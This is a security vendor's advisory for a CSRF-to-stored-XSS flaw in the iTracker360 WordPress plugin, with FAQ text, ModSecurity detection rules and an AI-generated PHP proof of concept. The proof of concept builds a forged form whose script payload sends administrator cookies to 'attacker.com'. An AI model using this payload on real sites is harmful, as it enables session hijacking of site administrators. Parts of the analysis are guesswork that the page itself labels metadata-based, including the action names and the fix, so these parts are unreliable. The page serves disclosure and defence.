What is CVE-2026-3572?

CVE-2026-3572 is a vulnerability in the iTracker360 plugin for WordPress that allows for Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS). It affects versions up to and including 2.2.0 due to missing nonce verification and insufficient input sanitization.

How does this vulnerability work?

The vulnerability allows an attacker to craft a malicious request that can be submitted by an administrator, injecting arbitrary JavaScript into the WordPress admin area. This occurs because the plugin does not verify the authenticity of the request and does not properly sanitize or escape user input.

Who is affected by this vulnerability?

Any WordPress site using the iTracker360 plugin version 2.2.0 or earlier is affected. Administrators who manage these sites are particularly at risk if they are tricked into submitting a malicious request.

How can I check if my site is vulnerable?

Check the version of the iTracker360 plugin installed on your WordPress site. If it is version 2.2.0 or earlier, your site is vulnerable. Additionally, review the plugin’s settings for any signs of unauthorized changes.

How can I fix this vulnerability?

To mitigate this vulnerability, update the iTracker360 plugin to version 2.2.1 or later, which includes security enhancements. Additionally, ensure that nonce verification and proper input sanitization are implemented in your custom code if applicable.

What does the CVSS score of 6.1 mean?

A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while exploitation requires some user interaction, it poses a significant risk as it can lead to unauthorized actions within the WordPress admin area.

What is Stored Cross-Site Scripting (XSS)?

Stored XSS is a type of vulnerability where an attacker can inject malicious scripts that are stored on the server and executed in the browser of users who access the affected page. In this case, it allows attackers to execute scripts in the context of the administrator’s session.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provides a script that generates a form designed to exploit the CSRF to Stored XSS vulnerability. When submitted by an administrator, it demonstrates how malicious JavaScript can be injected into the plugin’s settings.

What actions can an attacker perform if this vulnerability is exploited?

If exploited, an attacker can steal session cookies, perform actions as the administrator, or inject backdoors into the WordPress installation. The impact is limited to the security context of the logged-in administrator.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the iTracker360 plugin until a secure version is available. Additionally, monitor user activity and implement security measures such as web application firewalls.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, always validate and sanitize user inputs, implement nonce verification for form submissions, and keep all plugins and themes updated. Regular security audits can also help identify potential weaknesses.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-3572: iTracker360 <= 2.2.0 – Cross-Site Request Forgery to Stored Cross-Site Scripting via 'itracker_license' Settings Field (itracker360)

CVE ID CVE-2026-3572

Plugin itracker360

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 2.2.0

Patched Version —

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3572 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) to Stored Cross-Site Scripting (XSS) chain in the iTracker360 WordPress plugin. The flaw exists in the plugin’s license settings management functionality. Attackers can inject persistent malicious JavaScript into the WordPress admin area by tricking an administrator into submitting a forged request. The CVSS score of 6.1 (Medium) reflects the attack’s network accessibility, low complexity, and requirement for user interaction, with scope change indicating the attack impacts components beyond the vulnerable plugin.

Atomic Edge research identifies the root cause as a combination of two security failures. The primary failure is missing nonce verification on the settings form submission handler, confirmed by the CVE description. This allows CSRF attacks against the settings update function. The secondary failure is insufficient input sanitization and missing output escaping on the ‘itracker_license’ settings field, inferred from the CWE-79 classification. The plugin likely stores unsanitized user input in the WordPress options table and later outputs it without proper escaping in the admin interface.

Exploitation requires an attacker to craft a malicious link or form that targets the plugin’s settings update endpoint. The most probable attack vector is a POST request to /wp-admin/admin-post.php or /wp-admin/admin-ajax.php with an action parameter matching the plugin’s settings update hook, such as ‘itracker360_save_settings’ or ‘update_itracker360_options’. The request would contain a malicious payload in the ‘itracker_license’ parameter, for example: alert(document.cookie). An attacker would social engineer an administrator into clicking a link that submits this forged request, after which the XSS payload executes whenever the license settings page loads.

The remediation likely involves two code changes. First, developers must add proper nonce verification using wp_verify_nonce() and wp_nonce_field() to the settings form and its handler. Second, they must implement input sanitization using sanitize_text_field() or similar functions when saving the ‘itracker_license’ value. They must also implement output escaping using esc_html() or esc_attr() when displaying the license value in admin pages. The patched version 2.2.1 should contain these security enhancements.

Successful exploitation leads to stored XSS in the WordPress admin area. Attackers can steal administrator session cookies, perform actions as the administrator, deface the admin interface, or inject backdoors. The impact is limited to the security context of the logged-in administrator who views the compromised settings page. Attackers cannot directly escalate privileges but can hijack existing administrator sessions to gain full control of the WordPress installation.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3572 (metadata-based)
# This rule blocks exploitation of the CSRF to Stored XSS vulnerability in iTracker360 plugin
# The rule targets the specific settings update endpoint with malicious payloads in the 'itracker_license' parameter

SecRule REQUEST_URI "@endsWith /wp-admin/admin-post.php" 
  "id:1003572,phase:2,deny,status:403,chain,msg:'CVE-2026-3572: iTracker360 CSRF to Stored XSS via license field',severity:'CRITICAL',tag:'CVE-2026-3572',tag:'WordPress',tag:'iTracker360',tag:'XSS',tag:'CSRF'"
  SecRule ARGS_POST:action "@rx ^(itracker360_save_settings|update_itracker360_options|itracker360_update_license|save_itracker360_settings)$" 
    "chain,t:none"
    SecRule ARGS_POST:itracker_license "@rx <script[^>]*>" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,msg:'Detected XSS payload in iTracker360 license parameter'"

# Alternative rule for admin-ajax.php endpoint
SecRule REQUEST_URI "@endsWith /wp-admin/admin-ajax.php" 
  "id:1003573,phase:2,deny,status:403,chain,msg:'CVE-2026-3572: iTracker360 CSRF to Stored XSS via AJAX endpoint',severity:'CRITICAL',tag:'CVE-2026-3572',tag:'WordPress',tag:'iTracker360',tag:'XSS',tag:'CSRF'"
  SecRule ARGS_POST:action "@rx ^(itracker360_save_settings|update_itracker360_options|itracker360_update_license|save_itracker360_settings)$" 
    "chain,t:none"
    SecRule ARGS_POST:itracker_license "@rx <script[^>]*>" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,msg:'Detected XSS payload in iTracker360 license parameter'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3572 - iTracker360 <= 2.2.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting via 'itracker_license' Settings Field
<?php
/**
 * Proof of Concept for CVE-2026-3572
 * This script generates an HTML form that exploits the CSRF to Stored XSS vulnerability.
 * When a logged-in WordPress administrator visits this page and submits the form,
 * malicious JavaScript is injected into the iTracker360 license settings field.
 *
 * ASSUMPTIONS (based on metadata):
 * 1. The plugin uses admin-post.php or admin-ajax.php for settings updates
 * 2. The vulnerable parameter is 'itracker_license'
 * 3. No nonce verification exists in the settings handler
 * 4. The plugin slug 'itracker360' maps to action names
 */

$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin-post.php';
// Alternative endpoint if admin-post.php is not used:
// $target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin-ajax.php';

// Malicious payload - steals administrator cookies when settings page loads
$payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';

// Common WordPress admin action patterns for plugin settings
$possible_actions = [
    'itracker360_save_settings',
    'update_itracker360_options',
    'itracker360_update_license',
    'save_itracker360_settings'
];

// Use the first action name - adjust based on actual plugin behavior
$action = $possible_actions[0];

?>
<!DOCTYPE html>
<html>
<head>
    <title>iTracker360 Exploit PoC</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 40px; }
        .form { background: #f5f5f5; padding: 20px; border-radius: 5px; max-width: 500px; }
        .warning { color: #d00; font-weight: bold; }
    </style>
</head>
<body>
    <h1>CVE-2026-3572 Exploit PoC</h1>
    <p class="warning">WARNING: This form will inject malicious JavaScript into the target WordPress site if submitted by an administrator.</p>
    
    <div class="form">
        <h2>CSRF Attack Form</h2>
        <p>Target: <?php echo htmlspecialchars($target_url); ?></p>
        <p>Action parameter: <?php echo htmlspecialchars($action); ?></p>
        
        <form method="POST" action="<?php echo htmlspecialchars($target_url); ?>">
            <input type="hidden" name="action" value="<?php echo htmlspecialchars($action); ?>">
            <input type="hidden" name="itracker_license" value="<?php echo htmlspecialchars($payload); ?>">
            
            <p>Submit this form to inject the XSS payload into the iTracker360 license field.</p>
            <input type="submit" value="Inject Payload">
        </form>
    </div>
    
    <div style="margin-top: 30px; font-size: 0.9em; color: #666;">
        <h3>Technical Details:</h3>
        <ul>
            <li>Vulnerability: CSRF to Stored XSS in iTracker360 plugin</li>
            <li>Affected versions: <= 2.2.0</li>
            <li>Target parameter: itracker_license</li>
            <li>Payload: JavaScript that exfiltrates cookies to attacker server</li>
            <li>Execution: Payload runs when administrator views plugin settings page</li>
        </ul>
    </div>
</body>
</html>

Frequently Asked Questions

What is CVE-2026-3572?
Overview of the vulnerability
CVE-2026-3572 is a vulnerability in the iTracker360 plugin for WordPress that allows for Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS). It affects versions up to and including 2.2.0 due to missing nonce verification and insufficient input sanitization.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows an attacker to craft a malicious request that can be submitted by an administrator, injecting arbitrary JavaScript into the WordPress admin area. This occurs because the plugin does not verify the authenticity of the request and does not properly sanitize or escape user input.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the iTracker360 plugin version 2.2.0 or earlier is affected. Administrators who manage these sites are particularly at risk if they are tricked into submitting a malicious request.
How can I check if my site is vulnerable?
Steps to assess vulnerability
Check the version of the iTracker360 plugin installed on your WordPress site. If it is version 2.2.0 or earlier, your site is vulnerable. Additionally, review the plugin’s settings for any signs of unauthorized changes.
How can I fix this vulnerability?
Recommended remediation steps
To mitigate this vulnerability, update the iTracker360 plugin to version 2.2.1 or later, which includes security enhancements. Additionally, ensure that nonce verification and proper input sanitization are implemented in your custom code if applicable.
What does the CVSS score of 6.1 mean?
Understanding the risk level
A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while exploitation requires some user interaction, it poses a significant risk as it can lead to unauthorized actions within the WordPress admin area.
What is Stored Cross-Site Scripting (XSS)?
Definition and impact
Stored XSS is a type of vulnerability where an attacker can inject malicious scripts that are stored on the server and executed in the browser of users who access the affected page. In this case, it allows attackers to execute scripts in the context of the administrator’s session.
How does the proof of concept demonstrate the vulnerability?
Illustration of exploitation
The proof of concept provides a script that generates a form designed to exploit the CSRF to Stored XSS vulnerability. When submitted by an administrator, it demonstrates how malicious JavaScript can be injected into the plugin’s settings.
What actions can an attacker perform if this vulnerability is exploited?
Potential consequences of exploitation
If exploited, an attacker can steal session cookies, perform actions as the administrator, or inject backdoors into the WordPress installation. The impact is limited to the security context of the logged-in administrator.
What should I do if I cannot update the plugin immediately?
Interim mitigation strategies
If immediate updates are not possible, consider disabling the iTracker360 plugin until a secure version is available. Additionally, monitor user activity and implement security measures such as web application firewalls.
How can I prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, always validate and sanitize user inputs, implement nonce verification for form submissions, and keep all plugins and themes updated. Regular security audits can also help identify potential weaknesses.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations